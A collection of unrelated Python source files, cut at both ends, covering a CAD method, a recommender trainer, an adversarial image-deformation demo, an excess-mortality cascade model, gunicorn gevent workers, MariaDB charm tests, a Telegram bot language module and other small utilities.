self.cprint("============END RESHAPE=============\n")
def create(self):
""" Create this obj in CAD """
self.cprint("Creating obj " + self.name)
CADobj.create(self)
self.reshape()
self.docG.sendMsgToViews("ViewFit")
self.cprint("Done creating obj")
|
import sublime_plugin, sublime
SETTINGS_FILE = 'Software.sublime_settings'
SETTINGS = sublime.load_settings(SETTINGS_FILE)
def getValue(key, defaultValue):
SETTINGS = sublime.load_settings(SETTINGS_FILE)
return SETTINGS.get(key, defaultValue)
def setValue(key, value):
SETTINGS = sublime.load_settings(SETTINGS_FILE)
return SETTINGS.set(key, value)
|
import math
from weather import Weather
from mic import *
WORDS = ["weather", "temperature", "outside", "out there", "forecast"]
m = Mic()
def handle(text):
weather = Weather()
lookup = weather.lookup(91982014)
lookup = weather.lookup_by_location('ottawa')
condition = lookup.condition()
condition['temp'] = str(math.ceil((int(condition['temp']) - 32)*0.555555))
m.say("It is currently " + condition['temp'] + " degrees celcius and condition is " + condition['text']) |
import os
from os.path import isfile
import numpy as np
from util import read_data
from model import ImplicitALS
from evaluation import evaluate
import fire
def main(train_fn, test_fn=None, r=10, alpha=100, n_epoch=15, beta=1e-3,
cutoff=500, n_user_items=None, model_out_root=None,
model_name='wrmf'):
""""""
print('Loading data...')
d, y = read_data(train_fn, shape=n_user_items)
if test_fn is not None:
dt, yt = read_data(test_fn, shape=d.shape)
print('Fit model (r={:d})!'.format(r))
model = ImplicitALS(r, beta, alpha, n_epoch)
model.fit(d)
if test_fn is not None:
print('Evaluate!')
res, (trues, preds) = evaluate(model, y, yt, cutoff)
print(res)
if model_out_root is not None:
if not os.path.exists(model_out_root):
os.makedirs(model_out_root)
print('Save Model...')
if model_out_root is None:
model_out_root = os.path.join(os.getcwd(), 'data')
np.save(
os.path.join(model_out_root, '{}_U.npy'.format(model_name)),
model.user_factors
)
np.save(
os.path.join(model_out_root, '{}_V.npy'.format(model_name)),
model.item_factors
)
if __name__ == "__main__":
fire.Fire(main)
|
import bot
class Module(bot.Module):
def __init__(self, config):
super().__init__(config)
self.file = None
if 'file' in self.config:
self.file = open(self.config['file'], 'a')
def print(self, *args):
print(*args)
if self.file is not None:
self.file.write(' '.join(args))
async def on_ready(self):
self.print('log: ready')
async def on_message(self, message):
self.print('log: on_message', f'#{message.channel.name} <{message.author.name}>) {message.content}')
async def on_any_message(self, message):
self.print('log: on_any_message', f'#{message.channel.name} <{message.author.name}>) {message.content}')
async def on_occasion(self):
if self.config.get('occasions'):
self.print('log: on_occasion')
|
import numpy as np
import matplotlib.pyplot as plt
import os
import PIL.Image as Image
import torch
from torch.autograd import Variable
import torchvision.models as models
import torchvision.transforms as transforms
from deformation import ADef
from vector_fields import draw_vector_field
from write_results import write_results
def demo_mnist(batch_size, sigma):
path_to_resources = 'resources/'
Words = open(os.path.join(path_to_resources + 'synset_words.txt'), 'r').read().split('\n')
# Image is WIDTH x WIDTH x 3
WIDTH = 299
#net = models.resnet101(pretrained=True) # Use WIDTH = 224
net = models.inception_v3(pretrained=True) # Use WIDTH = 299
net.eval() # Turn off dropout and such
print('Model: ' + type(net).__name__)
# Image with min(width,height) >= WIDTH.
im_name = path_to_resources + 'im0.jpg'
image_PIL = Image.open(im_name)
print('Image: ' + im_name)
# Create tensor compatible with 'net'
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
normalize = transforms.Normalize( mean=mean, std=std )
image = transforms.Compose([
transforms.Resize(WIDTH),
transforms.CenterCrop(WIDTH),
transforms.ToTensor(),
normalize
])(image_PIL)
# 'net' accepts batches of images as Variable.
x = Variable( torch.unsqueeze( image, 0 ) )
Fx = net(x)
maxval, label = torch.max( Fx.data, 1 )
label = label.item()
# ADef config
test_case = 'imagenet'
candidates = 1
max_iter = 100
max_norm = np.inf
sigma = sigma
overshoot = 1.1
strong_targets = False
# Deform image using ADef
def_image, def_data = ADef( image, net, ind_candidates=candidates,
max_norm=max_norm, max_iter=max_iter,
smooth=sigma, overshoot=overshoot,
targeting=strong_targets )
def_image = def_image[0]
def_label = def_data['deformed_labels'][0]
vec_field = def_data['vector_fields'][0]
# # Get plottable images
# unnormalize = transforms.Compose([
# transforms.Normalize( [0,0,0], 1/std ),
# transforms.Normalize( -mean, [1,1,1] )
# ])
# def_image_PIL = transforms.Compose([
# unnormalize,
# transforms.ToPILImage()
# ])( def_image )
# image_PIL = transforms.Compose([
# unnormalize,
# transforms.ToPILImage()
# ])( image )
# Size of perturbation:
pertl2 = np.linalg.norm( image.numpy().ravel() - def_image.numpy().ravel(), ord=2 )
pertlinf = np.linalg.norm( image.numpy().ravel() - def_image.numpy().ravel(), ord=np.inf )
# Size of vector field:
vecnorms = np.sqrt( vec_field[:,:,0]**2 + vec_field[:,:,1]**2 ).numpy()
vfl2 = np.linalg.norm( vecnorms.ravel(), ord=2 )
vfT = np.linalg.norm( vecnorms.ravel(), ord=np.inf )
# # Plot results
# fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2,2)
# fig.set_size_inches(7,8)
#
# ax1.imshow( image_PIL )
# ax2.imshow( def_image_PIL )
# bg_image = np.array(def_image_PIL)//2 + 128
# ax3.imshow( bg_image )
# draw_vector_field( ax3, vec_field, amp=4, tol=0.01 )
# pert = 1.*np.array(def_image_PIL) - 1.*np.array(image_PIL)
# ax4.imshow( pert )
#
# original_title = Words[label][10:].split(',')[0]
# deformed_title = Words[def_label][10:].split(',')[0]
# ax1.set_title( 'Original: ' + original_title )
# ax2.set_title( 'Deformed: ' + deformed_title )
# ax3.set_title( 'Vector field' )
# ax4.set_title( 'Perturbation' )
#
# ax3.set_xlabel(r'$\ell^2$-norm: %.3f, $T$-norm: %.3f' %( vfl2, vfT ) )
# ax4.set_xlabel(r'$\ell^2$-norm: %.3f, $\ell^\infty$-norm: %.3f' %( pertl2, pertlinf ) )
#
# plt.show()
|
"""
Logit ratio analysis between excess mortality and covid deaths
- use covaraite idr_lagged
- pre-analysis getting prior
- cascade model infer location variation
"""
from typing import List, Dict, Union
from pathlib import Path
from scipy.optimize import LinearConstraint
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from regmod.data import Data
from regmod.variable import Variable, SplineVariable
from regmod.utils import SplineSpecs
from regmod.prior import UniformPrior, SplineUniformPrior, SplineGaussianPrior
from regmod.optimizer import scipy_optimize
from emmodel.model import ExcessMortalityModel
from emmodel.variable import ModelVariables
from emmodel.cascade import CascadeSpecs, Cascade
# data file path
data_path = Path("./examples/data_debug/2020-04-22/stage2_input.csv")
# result folder
results_path = Path("./examples/results_debug")
# define all variables
intercept_variable = Variable("intercept")
idr_spline_specs = SplineSpecs(
knots=np.linspace(0.0, 1.0, 5),
degree=2,
knots_type="rel_domain",
include_first_basis=False
)
idr_variable = SplineVariable("idr_lagged",
spline_specs=idr_spline_specs,
priors=[SplineUniformPrior(order=1, lb=-np.inf, ub=0.0),
SplineGaussianPrior(order=1, mean=0.0, sd=1e-4,
domain_lb=0.4, domain_ub=1.0)])
time_spline_specs = SplineSpecs(
knots=np.linspace(0.0, 1.0, 10),
degree=2,
knots_type="rel_domain",
include_first_basis=False,
r_linear=True
)
time_variable = SplineVariable("time_id",
spline_specs=time_spline_specs,
priors=[SplineGaussianPrior(order=1, mean=0.0, sd=1e-4,
domain_lb=0.9, domain_ub=1.0, size=2)])
# create variables for IDR global model
idr_model_variables = ModelVariables(
[intercept_variable,
idr_variable],
model_type="Linear"
)
# create variables for cascade
cascade_model_variables = ModelVariables(
[intercept_variable,
idr_variable,
time_variable],
model_type="Linear"
)
# construct the cascade model specification
cascade_specs = CascadeSpecs(
model_variables=[cascade_model_variables],
prior_masks={"intercept": [np.inf],
"idr_lagged": [1.0]*idr_variable.size,
"time_id": [1.0]*(time_variable.size - 1) + [0.1]},
level_masks=[1.0, 1.0, 10.0, 10.0],
col_obs="logit_ratio"
)
# sample setting
num_samples = 1000
np.random.seed(123)
# prediction function
def predict(df_pred: pd.DataFrame,
model: ExcessMortalityModel,
col_pred: str = "logit_ratio") -> pd.DataFrame:
df_pred = df_pred.copy()
pred = np.zeros(df_pred.shape[0])
for i in range(model.num_models):
model.data[i].attach_df(df_pred)
pred = pred + model.models[i].params[0].get_param(
model.results[i]["coefs"], model.data[i]
)
model.data[i].detach_df()
df_pred[col_pred] = pred
return df_pred
# link cascade model
def link_cascade_models(root_model: Cascade,
leaf_models: List[List[Cascade]],
model_structure: Union[Dict, List]):
if isinstance(model_structure, dict):
sub_model_names = model_structure.keys()
else:
sub_model_names = model_structure
sub_models = [model for model in leaf_models[0] if model.name in sub_model_names]
root_model.add_children(sub_models)
if isinstance(model_structure, dict):
for model in sub_models:
link_cascade_models(model, leaf_models[1:], model_structure[model.name])
# plot result
def plot_model(df, pred_dfs, locations) -> plt.Axes:
_, ax = plt.subplots(figsize=(8, 5))
ax.scatter(df.time_id, df.logit_ratio, color="gray")
colors = ["red", "#E88734", "#008080", "#02639B", "#172128"]
for i, location in enumerate(locations):
if location not in pred_dfs:
continue
pred_dfs[location].sort_values("time_id", inplace=True)
ax.plot(pred_dfs[location].time_id,
pred_dfs[location].logit_ratio,
color=colors[i], label=location)
if len(locations) == 1:
index = [True]*df.shape[0]
elif len(locations) == 2:
index = df.super_region_name == locations[-1]
elif len(locations) == 3:
index = df.region_name == locations[-1]
else:
index = df.ihme_loc_id == locations[-1]
ax.scatter(df.time_id[index], df.logit_ratio[index], color="#38ACEC")
ax.set_xlabel("time_id")
ax.set_ylabel("logit_ratio")
ax.set_title(locations[-1])
ax.legend()
return ax
def sample_coefs(cmodel: Cascade) -> pd.DataFrame:
model = cmodel.model
coefs = np.random.multivariate_normal(
mean=model.results[-1]["coefs"],
cov=model.results[-1]["vcov"],
size=num_samples
)
return pd.DataFrame(
coefs,
columns=[variable.name
for variable in model.models[-1].params[0].variables]
)
def main():
# load data
df_all = pd.read_csv(data_path)
df_all = df_all[df_all.include].reset_index(drop=True)
national_index = df_all.ihme_loc_id.str.len() == 3
df_national = df_all[national_index].reset_index(drop=True)
df_subnational = df_all[~national_index].reset_index(drop=True)
df = df_national
# create results folder
if not results_path.exists():
results_path.mkdir()
# Fit global IDR model
idr_model = ExcessMortalityModel(df, [idr_model_variables], col_obs="logit_ratio")
idr_model.run_models()
# attach data to create spline
data = Data(
col_obs="logit_ratio",
col_covs=[intercept_variable.name,
idr_variable.name,
time_variable.name]
)
data.df = df
idr_variable.check_data(data)
time_variable.check_data(data)
# fix idr coefficients
coefs = idr_model.results[0]["coefs"][1:]
idr_variable.add_priors(UniformPrior(lb=coefs, ub=coefs))
# getting location structure
location_structure = {}
for super_region in df.super_region_name.unique():
regions = df[df.super_region_name == super_region].region_name.unique()
location_structure[super_region] = {}
for region in regions:
nationals = list(
df_national[df_national.region_name == region].ihme_loc_id.unique()
)
location_structure[super_region][region] = {}
for national in nationals:
subnational_index = df_subnational.ihme_loc_id.str.startswith(national)
location_structure[super_region][region][national] = list(
df_subnational.ihme_loc_id[subnational_index].unique()
)
# construct cascade model
# global model
global_model = Cascade(df, cascade_specs, level_id=0, name="Global")
# super region model
super_region_models = [
Cascade(df[df.super_region_name == super_region].reset_index(drop=True),
cascade_specs,
level_id=1,
name=super_region)
for super_region in df.super_region_name.unique()
]
# region model
region_models = [
Cascade(df[df.region_name == region].reset_index(drop=True),
cascade_specs,
level_id=2,
name=region)
for region in df.region_name.unique()
]
# national model
national_models = [
Cascade(df_national[df_national.ihme_loc_id == national].reset_index(drop=True),
cascade_specs,
level_id=3,
name=national)
for national in df_national.ihme_loc_id.unique()
]
# subnational model
subnational_models = [
Cascade(df_subnational[df_subnational.ihme_loc_id == subnational].reset_index(drop=True),
cascade_specs,
level_id=4,
name=subnational)
for subnational in df_subnational.ihme_loc_id.unique()
]
# link all models together
link_cascade_models(global_model,
[super_region_models, region_models, national_models, subnational_models],
location_structure)
# fit model
global_model.run_models()
# create plots
model_list = global_model.to_list()
# predict
pred_dfs = {}
for cmodel in model_list:
pred_dfs[cmodel.name] = predict(cmodel.df, cmodel.model)
# plot
for loc_id in df_all.ihme_loc_id.unique():
df_sub = df_all[df_all.ihme_loc_id == loc_id]
loc_structure = [
"Global",
df_sub.super_region_name.values[0],
df_sub.region_name.values[0]
]
if len(loc_id) > 3:
loc_structure.extend([loc_id[:3], loc_id])
else:
loc_structure.append(loc_id)
plot_model(df_all, pred_dfs, loc_structure)
plt.savefig(results_path / f"{loc_id}.pdf", bbox_inches="tight")
plt.close("all")
# # create results dataframe
# coefs = pd.concat([model.model.get_coefs_df() for model in model_list])
# coefs["location"] = [model.name for model in model_list]
# coefs.to_csv(results_path / "coefs.csv", index=False)
# # create samples of the coefficient
# for cmodel in model_list:
# df_coefs = sample_coefs(cmodel)
# df_coefs.to_csv(results_path / f"cdraws_{cmodel.level_id}_{cmodel.name}.csv", index=False)
return model_list
if __name__ == "__main__":
models = main()
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
#import xdem.version
# Allow conf.py to find the xdem module
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "../../"))
# -- Project information -----------------------------------------------------
project = 'xdem'
copyright = '2021, xdem contributors'
author = 'xdem contributors'
# The full version, including alpha/beta/rc tags
release = "0.0.1"
os.environ["PYTHON"] = sys.executable
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc", # Create the API documentation automatically
"sphinx.ext.viewcode", # Create the "[source]" button in the API to show the source code.
'matplotlib.sphinxext.plot_directive', # Render matplotlib figures from code.
"sphinx.ext.autosummary", # Create API doc summary texts from the docstrings.
"sphinx.ext.inheritance_diagram", # For class inheritance diagrams (see coregistration.rst).
"sphinx_autodoc_typehints", # Include type hints in the API documentation.
"sphinxcontrib.programoutput"
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
"api/modules.rst" # This is not really needed, but is created automatically by autodoc
]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static'] # Commented out as we have no custom static data
def run_apidoc(_):
"""
Make sure readthedocs finds the module.
Maybe this is not needed?
"""
from sphinx.ext.apidoc import main
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
cur_dir = os.path.abspath(os.path.dirname(__file__))
module = os.path.join(cur_dir, "../../", "xdem")
output_path = os.path.join(cur_dir, 'api/')
main(['-e', '-o', output_path, module, os.path.join(module, "version.py"), "--force"])
def setup(app):
app.connect('builder-inited', run_apidoc)
|
from infrastructure.db.question_solution_schema import QuestionSolution
import logging
logger = logging.getLogger(__name__)
class QuestionSolutionRepositoryPostgres:
def add_question_solution(self, db, question_solution):
db.add(question_solution)
db.commit()
logger.info("Added new question solution")
logger.debug("ID of the new question solution: %s", question_solution.id)
def get_question_solution(self, db, question_solution_id):
question_solution = db.query(QuestionSolution).filter(QuestionSolution.id == question_solution_id).first()
logger.debug("Getting question solution %s", question_solution_id)
return question_solution
def get_all_question_solutions_by_question_template_id(self, db, question_template_id):
query = db.query(QuestionSolution).filter(QuestionSolution.question_template_id == question_template_id)
question_solutions = query.all()
logger.debug("Getting all question solutions of question template %s", question_template_id)
return question_solutions
def get_all_question_solutions_by_exam_solution_id(self, db, exam_solution_id):
query = db.query(QuestionSolution).filter(QuestionSolution.exam_solution_id == exam_solution_id)
question_solutions = query.all()
logger.debug("Getting all question solutions of exam solution %s", exam_solution_id)
return question_solutions
def delete_question_solution(self, db, question_solution):
db.delete(question_solution)
db.commit()
logger.debug("Delete question solution %s", question_solution.id)
logger.info("Question solution deleted")
def update_question_solution(self, db):
db.commit()
|
# File: recordedfuture_consts.py
#
# Copyright (c) Recorded Future, Inc, 2019-2022
#
# This unpublished material is proprietary to Recorded Future. All
# rights reserved. The methods and techniques described herein are
# considered trade secrets and/or confidential. Reproduction or
# distribution, in whole or in part, is forbidden except by express
# written permission of Recorded Future.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
# Define your constants here
version = '3.1.0'
buildid = '264'
# timeout for our http requests to bfi_phantom
timeout = 33
# These dicts map which path_info, which fields, what the Recorded Future
# category is called and whether to quote the entity or not.
# They are used to make the reputation/intelligence method parameterized.
# (path_info template, fields, quote parameter)
INTELLIGENCE_MAP = {
'ip': (
'/ip/%s',
[
'entity',
'risk',
'timestamps',
"threatLists",
"intelCard",
"metrics",
"location",
"relatedEntities",
],
'ip',
False,
),
'domain': (
'/domain/idn:%s',
[
'entity',
'risk',
'timestamps',
"threatLists",
"intelCard",
"metrics",
"relatedEntities",
],
'domain',
False,
),
'file': (
'/hash/%s',
[
'entity',
'risk',
'timestamps',
"threatLists",
"intelCard",
"metrics",
"hashAlgorithm",
"relatedEntities",
],
'hash',
False,
),
'vulnerability': (
'/vulnerability/%s',
[
'entity',
'risk',
'timestamps',
"threatLists",
"intelCard",
"metrics",
"cvss",
"nvdDescription",
"relatedEntities",
],
'vulnerability',
False,
),
'url': (
'/url/%s',
['entity', 'risk', 'timestamps', "metrics", "relatedEntities"],
'url',
True,
),
}
|
# -*- coding: utf-8 -*-
# Copyright 2021 Cohesity Inc.
import cohesity_management_sdk.models.recover_virtual_disk_info_proto
import cohesity_management_sdk.models.recover_virtual_disk_params
class RecoverDisksTaskStateProto(object):
"""Implementation of the 'RecoverDisksTaskStateProto' model.
TODO: type model description here.
Attributes:
recover_virtual_disk_info (RecoverVirtualDiskInfoProto): Each
available extension is listed below along with the location of the
proto file (relative to magneto/connectors) where it is defined.
RecoverVirtualDiskInfoProto extension Location
===================================================================
==========
===================================================================
==========
recover_virtual_disk_params (RecoverVirtualDiskParams): TODO: type
description here.
"""
# Create a mapping from Model property names to API property names
_names = {
"recover_virtual_disk_info":'recoverVirtualDiskInfo',
"recover_virtual_disk_params":'recoverVirtualDiskParams'
}
def __init__(self,
recover_virtual_disk_info=None,
recover_virtual_disk_params=None):
"""Constructor for the RecoverDisksTaskStateProto class"""
# Initialize members of the class
self.recover_virtual_disk_info = recover_virtual_disk_info
self.recover_virtual_disk_params = recover_virtual_disk_params
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
recover_virtual_disk_info = cohesity_management_sdk.models.recover_virtual_disk_info_proto.RecoverVirtualDiskInfoProto.from_dictionary(dictionary.get('recoverVirtualDiskInfo')) if dictionary.get('recoverVirtualDiskInfo') else None
recover_virtual_disk_params = cohesity_management_sdk.models.recover_virtual_disk_params.RecoverVirtualDiskParams.from_dictionary(dictionary.get('recoverVirtualDiskParams')) if dictionary.get('recoverVirtualDiskParams') else None
# Return an object of this model
return cls(recover_virtual_disk_info,
recover_virtual_disk_params)
|
import re
from .site import main, Site
class Amazon(Site):
"""amazon.com"""
BASE_URL = 'https://www.amazon.com'
NAMES = {
'en': 'Amazon',
'ja-jp': 'Amazon',
'zh-cn': '亚马逊',
}
MIN_RATING = 1
MAX_RATING = 5
SEARCH_LOCALES = ['en-jp', 'en']
def info_url(self, id):
return f'{self.BASE_URL}/dp/{id}'
def _get_rating(self, id):
soup = self._get_soup(self.info_url(id))
rating_str = soup.find(class_="arp-rating-out-of-text").get_text()
rating = float(rating_str.strip().split()[0])
count = int(soup.find(class_="totalReviewCount").get_text())
return rating, count
def _search(self, name):
# Amazon has lots of stuff, so we only match whole words here.
params = {
'field-keywords': '"' + name + '"',
'rh': 'n:2858778011,n:2864549011',
}
soup = self._get_soup(self.BASE_URL + '/s', params=params)
# Handle no results cases.
if soup.find(id='apsRedirectLink') or soup.find(id='noResultsTitle'):
raise RuntimeError('No results found')
regex = re.compile(r'/dp/(\w+)')
href = soup.find('a', href=regex)['href']
id = regex.search(href).group(1)
return id
if __name__ == '__main__':
main(Amazon(), {'en': 'Dropkick on My Devil!'})
|
# -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
from __future__ import with_statement
import os
import sys
# workaround on osx, disable kqueue
if sys.platform == "darwin":
os.environ['EVENT_NOKQUEUE'] = "1"
import gevent
from gevent.pool import Pool
from gevent.server import StreamServer
from gevent import pywsgi, wsgi
import gunicorn
from gunicorn.workers.async import AsyncWorker
from gunicorn.workers.base import Worker
VERSION = "gevent/%s gunicorn/%s" % (gevent.__version__, gunicorn.__version__)
BASE_WSGI_ENV = {
'GATEWAY_INTERFACE': 'CGI/1.1',
'SERVER_SOFTWARE': VERSION,
'SCRIPT_NAME': '',
'wsgi.version': (1, 0),
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False
}
class GGeventServer(StreamServer):
def __init__(self, listener, handle, spawn='default', worker=None):
StreamServer.__init__(self, listener, spawn=spawn)
self.handle_func = handle
self.worker = worker
def stop(self, timeout=None):
super(GGeventServer, self).stop(timeout=timeout)
def handle(self, sock, addr):
self.handle_func(sock, addr)
class GeventWorker(AsyncWorker):
def __init__(self, *args, **kwargs):
super(GeventWorker, self).__init__(*args, **kwargs)
@classmethod
def setup(cls):
from gevent import monkey
monkey.noisy = False
monkey.patch_all()
def timeout_ctx(self):
return gevent.Timeout(self.cfg.keepalive, False)
def run(self):
self.socket.setblocking(1)
pool = Pool(self.worker_connections)
server = GGeventServer(self.socket, self.handle, spawn=pool,
worker=self)
server.start()
try:
while self.alive:
self.notify()
if self.ppid != os.getppid():
self.log.info("Parent changed, shutting down: %s" % self)
break
gevent.sleep(0.1)
except KeyboardInterrupt:
pass
try:
# Try to stop connections until timeout
self.notify()
server.stop(timeout=self.timeout)
except:
pass
def handle_request(self, *args):
try:
super(GeventWorker, self).handle_request(*args)
except gevent.GreenletExit:
pass
def init_process(self):
#gevent doesn't reinitialize dns for us after forking
#here's the workaround
gevent.core.dns_shutdown(fail_requests=1)
gevent.core.dns_init()
super(GeventWorker, self).init_process()
class GeventBaseWorker(Worker):
"""\
This base class is used for the two variants of workers that use
Gevent's two different WSGI workers. ``gevent_wsgi`` worker uses
the libevent HTTP parser but does not support streaming response
bodies or Keep-Alive. The ``gevent_pywsgi`` worker uses an
alternative Gevent WSGI server that supports streaming and Keep-
Alive but does not use the libevent HTTP parser.
"""
server_class = None
wsgi_handler = None
def __init__(self, *args, **kwargs):
super(GeventBaseWorker, self).__init__(*args, **kwargs)
self.worker_connections = self.cfg.worker_connections
@classmethod
def setup(cls):
from gevent import monkey
monkey.patch_all()
def run(self):
self.socket.setblocking(1)
pool = Pool(self.worker_connections)
self.server_class.base_env['wsgi.multiprocess'] = (self.cfg.workers > 1)
server = self.server_class(self.socket, application=self.wsgi,
spawn=pool, handler_class=self.wsgi_handler)
server.start()
try:
while self.alive:
self.notify()
if self.ppid != os.getppid():
self.log.info("Parent changed, shutting down: %s" % self)
break
gevent.sleep(0.1)
except KeyboardInterrupt:
pass
# try to stop the connections
try:
self.notify()
server.stop(timeout=self.timeout)
except:
pass
class WSGIHandler(wsgi.WSGIHandler):
def log_request(self, *args):
pass
def prepare_env(self):
env = super(WSGIHandler, self).prepare_env()
env['RAW_URI'] = self.request.uri
return env
class WSGIServer(wsgi.WSGIServer):
base_env = BASE_WSGI_ENV
class GeventWSGIWorker(GeventBaseWorker):
"The libevent HTTP based workers"
server_class = WSGIServer
wsgi_handler = WSGIHandler
class PyWSGIHandler(pywsgi.WSGIHandler):
def log_request(self, *args):
pass
def get_environ(self):
env = super(PyWSGIHandler, self).get_environ()
env['gunicorn.sock'] = self.socket
env['RAW_URI'] = self.path
return env
class PyWSGIServer(pywsgi.WSGIServer):
base_env = BASE_WSGI_ENV
class GeventPyWSGIWorker(GeventBaseWorker):
"The Gevent StreamServer based workers."
server_class = PyWSGIServer
wsgi_handler = PyWSGIHandler
|
# Learn more about testing at: https://juju.is/docs/sdk/testing
import unittest
from unittest.mock import Mock
from charm import MariadbCharm
from ops.model import ActiveStatus
from ops.testing import Harness
from charm import COMMAND
from unittest.mock import patch
class TestCharm(unittest.TestCase):
def setUp(self):
self.harness = Harness(MariadbCharm)
self.addCleanup(self.harness.cleanup)
self.harness.begin()
def test_config_changed(self):
self.assertEqual(list(self.harness.charm._stored.ports), [3306])
self.harness.update_config({"port": 4000})
self.assertEqual(list(self.harness.charm._stored.ports), [4000])
def test_mariadb_pebble_ready(self):
# Check the initial Pebble plan is empty
initial_plan = self.harness.get_container_pebble_plan("mariadb")
self.assertEqual(initial_plan.to_yaml(), "{}\n")
# Expected plan after Pebble ready with default config
expected_plan = {
"services": {
"mariadb": {
"override": "replace",
"summary": "mariadb",
"command": COMMAND,
"startup": "enabled",
"environment": {
"MYSQL_ROOT_PASSWORD": self.harness.charm._stored.root_password,
},
}
},
}
# Get the mariadb container from the model
container = self.harness.model.unit.get_container("mariadb")
# Emit the PebbleReadyEvent carrying the mariadb container
self.harness.charm.on.mariadb_pebble_ready.emit(container)
# Get the plan now we've run PebbleReady
updated_plan = self.harness.get_container_pebble_plan("mariadb").to_dict()
# Check we've got the plan we expected
self.assertEqual(expected_plan, updated_plan)
# Check the service was started
service = self.harness.model.unit.get_container("mariadb").get_service("mariadb")
self.assertTrue(service.is_running())
# Ensure we set an ActiveStatus with no message
self.assertEqual(self.harness.model.unit.status, ActiveStatus())
def test_restart_action(self):
# test restart action
action_event = Mock(params={"fail": ""})
self.harness.charm._on_restart_action(action_event)
self.assertTrue(action_event.set_results.called)
def test_restart_action_fail(self):
action_event = Mock(params={"fail": "fail this"})
self.harness.charm._on_restart_action(action_event)
self.assertTrue(action_event.set_results.called)
# @patch("subprocess.check_output")
# def test_restore_action(self, mock_check_output):
# # test restore action
# def mock_check_output(*a, **kw):
# return "mock"
# mock_check_output.return_value = 'mocked!'
# subprocess.check_output = mock_check_output
# action_event = Mock(params={"fail": ""})
# self.harness.charm._on_restore_action(action_event)
# self.assertTrue(action_event.set_results.called)
@patch("subprocess.check_output")
def test_list_action(self, mock_check_output):
# test list backup action
mock_check_output.return_value = '/data/db/testfile'.encode()
action_event = Mock(params={"fail": ""})
self.harness.charm._on_list_backup(action_event)
self.assertTrue(action_event.set_results.called)
@patch("subprocess.check_output")
def test_list_action_fail(self, mock_check_output):
# test list backup action
# mock_check_output.return_value = "fail this".encode()
action_event = Mock(params={"fail": "fail this"})
self.harness.charm._on_list_backup(action_event)
self.assertTrue(action_event.set_results.called)
|
import gettext
from google.cloud import datastore
from telegram import CallbackQuery, InlineKeyboardButton, InlineKeyboardMarkup, Update
from telegram.chataction import ChatAction
from telegram.ext import CallbackContext
from pdf_bot.consts import LANGUAGE, LANGUAGES, USER
from pdf_bot.store import client
def send_lang(update: Update, context: CallbackContext, query: CallbackQuery = None):
update.effective_message.reply_chat_action(ChatAction.TYPING)
lang = get_lang(update, context, query)
langs = [
InlineKeyboardButton(key, callback_data=key)
for key, value in sorted(LANGUAGES.items(), key=lambda x: x[1])
if value != lang
]
keyboard_size = 2
keyboard = [
langs[i : i + keyboard_size] for i in range(0, len(langs), keyboard_size)
]
reply_markup = InlineKeyboardMarkup(keyboard)
_ = set_lang(update, context)
update.effective_message.reply_text(
_("Select your language"), reply_markup=reply_markup
)
def get_lang(update: Update, context: CallbackContext, query: CallbackQuery = None):
if context.user_data is not None and LANGUAGE in context.user_data:
lang = context.user_data[LANGUAGE]
else:
if query is None:
sender = update.effective_message.from_user or update.effective_chat
user_id = sender.id
else:
user_id = query.from_user.id
user_key = client.key(USER, user_id)
user = client.get(key=user_key)
if user is None or LANGUAGE not in user:
lang = "en_GB"
else:
lang = user[LANGUAGE]
if lang == "en":
lang = "en_GB"
if context.user_data is None:
context.user_data = {LANGUAGE: lang}
else:
context.user_data[LANGUAGE] = lang
return lang
def store_lang(update, context, query):
lang_code = LANGUAGES[query.data]
with client.transaction():
user_key = client.key(USER, query.from_user.id)
user = client.get(key=user_key)
if user is None:
user = datastore.Entity(user_key)
user[LANGUAGE] = lang_code
client.put(user)
context.user_data[LANGUAGE] = lang_code
_ = set_lang(update, context)
query.message.edit_text(
_("Your language has been set to {language}").format(language=query.data)
)
def set_lang(update, context, query=None):
lang = get_lang(update, context, query)
t = gettext.translation("pdf_bot", localedir="locale", languages=[lang])
return t.gettext
|
# events.py
# Copyright 2008 Roger Marsh
# Licence: See LICENCE (BSD licence)
"""Results database Event panel class.
"""
import tkinter.messagebox
from ..core import resultsrecord
from ..core import ecfmaprecord
from ..core import filespec
from . import events_lite
class Events(events_lite.Events):
"""The Events panel for a Results database."""
_btn_ecfplayers = "events_players"
def __init__(self, parent=None, cnf=dict(), **kargs):
"""Extend and define the results database events panel."""
super(Events, self).__init__(parent=parent, cnf=cnf, **kargs)
def on_ecf_players(self, event=None):
"""Do processing for buttons with command set to on_ecf_players."""
